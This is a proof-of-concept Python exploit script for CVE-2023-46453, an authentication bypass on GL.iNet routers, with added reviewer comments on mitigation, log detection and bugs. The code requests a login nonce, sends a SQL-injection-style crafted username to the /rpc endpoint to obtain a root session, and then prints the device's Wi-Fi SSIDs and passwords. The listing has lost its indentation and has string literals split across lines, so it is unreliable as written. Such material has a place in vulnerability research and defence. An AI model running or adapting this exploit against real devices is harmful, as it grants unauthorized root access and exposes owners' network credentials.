Affected version (影响版本): 4.3.7
POC
# CVE: CVE-2023-46453
from urllib.parse import urlparse
import requests
import hashlib
import random
import sys
# Reproduces the CVE-2023-46453 authentication bypass against the /rpc
# JSON-RPC endpoint of a GL.iNet device (version header on this page: 4.3.7):
# fetch a challenge nonce, log in with a crafted username, then prove the
# session is privileged by calling system.get_status and printing Wi-Fi data.
# NOTE(review): the listing has lost its indentation and two string literals
# are split across lines; it is kept byte-for-byte here and only annotated.
# Mitigation: deploy firmware in which the vendor addresses CVE-2023-46453
# (check the vendor advisory for the fixed release), and keep /rpc off
# untrusted networks. Detection: "login" calls whose username carries quote
# characters, union/select keywords or "--" (as in the request below) are a
# direct indicator of this attack in RPC/web logs.
#
# url: any URL of the target; only scheme and host are kept (see below).
# Exits the process with status 1 on every failure path; returns None.
def exploit(url):
try:
# Silences urllib3's InsecureRequestWarning; every request below uses
# verify=False, so the device certificate is never validated.
requests.packages.urllib3.disable_warnings()
# Rebuild the target as scheme://host/rpc, discarding any path the caller gave.
host = urlparse(url)
url = f"{host.scheme}://{host.netloc}/rpc"
print(f"[*] Target: {url}")
print("[*] Retrieving nonce...")
# Step 1: JSON-RPC "challenge" for user root; the reply is expected to carry
# result.nonce, which feeds the hash computed in step 2.
nonce = requests.post(url, verify=False, json={
"jsonrpc": "2.0",
"id": random.randint(1000, 9999),
"method": "challenge",
"params": {"username": "root"}
}, timeout=5).json()
if "result" in nonce and "nonce" in nonce["result"]:
print(f"[*] Got nonce: {nonce['result']['nonce']} !")
else:
print("[!] Nonce not found, exiting... :(")
sys.exit(1)
print("[*] Retrieving authentication token for root...")
# Step 2: the "hash" parameter is the MD5 of the crafted username joined with
# fixed fields, "0" and the nonce from step 1 (the device's challenge scheme
# presumably mirrors this construction; not verifiable from this listing).
md5_hash = hashlib.md5()
md5_hash.update(
f"roo[^'union selecT
char(114,111,111,116)--]:[^:]+:[^:]+:0:{nonce['result']['nonce']}".encode())
password = md5_hash.hexdigest()
# The username sent here is the crafted value, not "root"; this request is
# the one a defender should be able to spot in logs.
token = requests.post(url, verify=False, json={
"jsonrpc": "2.0",
"id": random.randint(1000, 9999),
"method": "login",
"params": {
"username": f"roo[^'union selecT
char(114,111,111,116)--]:[^:]+:[^:]+",
"hash": password
}
}, timeout=5).json()
# A session id (result.sid) in the reply means the bypass succeeded.
if "result" in token and "sid" in token["result"]:
print(f"[*] Got token: {token['result']['sid']} !")
else:
print("[!] Token not found, exiting... :(")
sys.exit(1)
print("[*] Checking if we are root...")
# Step 3: authenticated "call" with the obtained sid; a "wifi" key in the
# result is taken as proof of privileged access.
check = requests.post(url, verify=False, json={
"jsonrpc": "2.0",
"id": random.randint(1000, 9999),
"method": "call",
"params": [token["result"]["sid"], "system", "get_status", {}]
}, timeout=5).json()
if "result" in check and "wifi" in check["result"]:
print("[*] We are authenticated as root! :)")
print("[*] Below some info:")
# Impact demonstration: the Wi-Fi credentials are readable once authenticated.
for wifi in check["result"]["wifi"]:
print(f"[*] --------------------")
print(f"[*] SSID: {wifi['ssid']}")
print(f"[*] Password: {wifi['passwd']}")
print(f"[*] Band: {wifi['band']}")
print(f"[*] --------------------")
else:
print("[!] Something went wrong, exiting... :(")
sys.exit(1)
# Any of the three requests exceeding the 5 s timeout lands here.
except requests.exceptions.Timeout:
print("[!] Timeout error, exiting... :(")
sys.exit(1)
# NOTE(review): `e` is never bound in this handler, so a Ctrl-C raises
# NameError here instead of printing the message; the message text also
# does not describe an interrupt.
except KeyboardInterrupt:
print(f"[!] Something went wrong: {e}")
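if __name__ == "__main__":
    # Entry point: expects exactly one argument, the target URL, and hands it
    # to exploit(); prints usage and exits otherwise.
    print("GL.iNet Auth Bypass\n")
    if len(sys.argv) < 2:
        # argv[0] is the script name; the original printed argv[1], which
        # does not exist on this path and raised IndexError instead of usage.
        print(
            f"Usage: python3 {sys.argv[0]} https://target.com",
            file=sys.stderr)
        sys.exit(0)
    else:
        exploit(sys.argv[1])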